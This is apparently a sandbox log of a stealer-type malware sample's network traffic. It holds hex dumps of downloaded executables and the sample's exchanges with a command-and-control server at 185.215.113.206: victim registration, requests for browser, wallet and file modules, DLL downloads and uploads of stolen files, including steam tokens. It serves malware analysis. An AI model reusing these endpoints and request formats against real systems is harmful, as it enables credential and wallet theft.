6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 Jan 2025 14:44:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 Jan 2025 14:44:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDBFBGIDHCAAKEBAKFIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 30 32 42 46 38 38 35 44 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 62 72 61 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 42 46 42 47 49 44 48 43 41 41 4b 45 42 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="hwid"5E02BF885D872556134559------CGDBFBGIDHCAAKEBAKFIContent-Disposition: form-data; name="build"brat------CGDBFBGIDHCAAKEBAKFI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="message"browsers------AKKKECBKKECGCAAAEHJK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 43 41 41 41 41 46 42 41 4b 45 42 46 42 41 4b 4b 2d 2d 0d 0a Data Ascii: ------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------CFCFCAAAAFBAKEBFBAKKContent-Disposition: form-data; name="message"plugins------CFCFCAAAAFBAKEBFBAKK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 41 46 48 43 42 41 4b 46 43 41 41 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------FHIDAFHCBAKFCAAKFCFCContent-Disposition: form-data; name="message"fplugins------FHIDAFHCBAKFCAAKFCFC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.215.113.206Content-Length: 6419Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="file"------JJEGIJEGDBFHDGCAFCAE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHCFBAKFBGDGDHJKJJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 43 46 42 41 4b 46 42 47 44 47 44 48 4a 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 43 46 42 41 4b 46 42 47 44 47 44 48 4a 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 43 46 42 41 4b 46 42 47 44 47 44 48 4a 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 43 46 42 41 4b 46 42 47 44 47 44 48 4a 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------FIDHCFBAKFBGDGDHJKJJContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------FIDHCFBAKFBGDGDHJKJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIDHCFBAKFBGDGDHJKJJContent-Disposition: form-data; name="file"------FIDHCFBAKFBGDGDHJKJJ--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="message"wallets------IECAFHDBGHJKFIDHJJJE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="message"files------FHCGHJDBFIIDGDHIJDBG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="file"------AAEBAFBGIDHCBFHIECFC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBKHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 